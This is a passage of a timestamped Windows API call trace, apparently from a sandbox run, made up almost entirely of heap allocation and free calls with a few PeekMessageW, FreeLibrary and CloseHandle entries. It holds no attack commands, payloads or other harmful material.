RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.654] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.654] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.655] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.655] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.655] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.655] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.656] CloseHandle (hObject=0x120) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0173.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.657] CloseHandle (hObject=0x138) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0173.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 